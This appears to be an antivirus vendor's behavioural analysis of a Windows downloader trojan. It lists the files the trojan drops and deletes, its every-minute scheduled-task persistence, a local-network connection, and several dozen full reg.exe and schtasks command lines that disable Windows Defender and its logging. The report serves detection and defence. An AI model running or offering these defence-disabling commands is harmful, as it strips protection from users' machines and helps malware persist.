Trojan.DownLoader34.36975

Technical Information

To ensure autorun and distribution

Creates or modifies the following files

<SYSTEM32>\tasks\wpjobl.exe

Malicious functions

To complicate detection of its presence in the operating system,

blocks execution of the following system utilities:

Windows Defender

Modifies file system

Creates the following files

%TEMP%\autc3ab.tmp
%TEMP%\fjvmdo.exe
%APPDATA%\windata\tzquiw.exe
C:\users\public\gf6em79rq0j8awyizihplm17w6vzuxy12pqqjbsh\final product0099.exe
%TEMP%\rarsfx0\avdisable.bat
%TEMP%\rarsfx0\invisibl - copie64 - copie.vbs

Deletes the following files

%TEMP%\autc3ab.tmp
C:\users\public\gf6em79rq0j8awyizihplm17w6vzuxy12pqqjbsh\final product0099.exe

Network activity

Connects to

'<LOCALNET>.1.2':57903

Miscellaneous

Searches for the following windows

ClassName: 'EDIT' WindowName: ''

Creates and executes the following

'%TEMP%\fjvmdo.exe'
'C:\users\public\gf6em79rq0j8awyizihplm17w6vzuxy12pqqjbsh\final product0099.exe'
'%APPDATA%\windata\tzquiw.exe'
'%WINDIR%\syswow64\cmd.exe' /c mkdir Gf6EM79Rq0j8AwyIZIHplm17w6vZUxY12PqqJbsh' (with hidden window)
'C:\users\public\gf6em79rq0j8awyizihplm17w6vzuxy12pqqjbsh\final product0099.exe' ' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c schtasks /create /tn WPJOBL.exe /tr %APPDATA%\Windata\TZQUIW.exe /sc minute /mo 1' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c avdisable.bat' (with hidden window)
'%APPDATA%\windata\tzquiw.exe' ' (with hidden window)

Executes the following

'%WINDIR%\syswow64\cmd.exe' /c mkdir Gf6EM79Rq0j8AwyIZIHplm17w6vZUxY12PqqJbsh
'%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
'%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
'%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
'%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
'%WINDIR%\syswow64\reg.exe' delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
'%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
'%WINDIR%\syswow64\reg.exe' delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
'%WINDIR%\syswow64\reg.exe' delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
'%WINDIR%\syswow64\reg.exe' delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
'%WINDIR%\syswow64\reg.exe' delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
'%WINDIR%\syswow64\wscript.exe' "%TEMP%\RarSFX0\invisibl - Copie64 - Copie.vbs"
'%WINDIR%\syswow64\schtasks.exe' /create /tn WPJOBL.exe /tr %APPDATA%\Windata\TZQUIW.exe /sc minute /mo 1
'%WINDIR%\syswow64\cmd.exe' /c avdisable.bat
'%WINDIR%\syswow64\reg.exe' delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
'%WINDIR%\syswow64\cmd.exe' /c schtasks /create /tn WPJOBL.exe /tr %APPDATA%\Windata\TZQUIW.exe /sc minute /mo 1
'%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
'<SYSTEM32>\taskeng.exe' {EBC06F77-6201-4FF9-9DE9-855309D9DCC8} S-1-5-21-1960123792-2022915161-3775307078-1001:kfxcltxkff\user:Interactive:[1]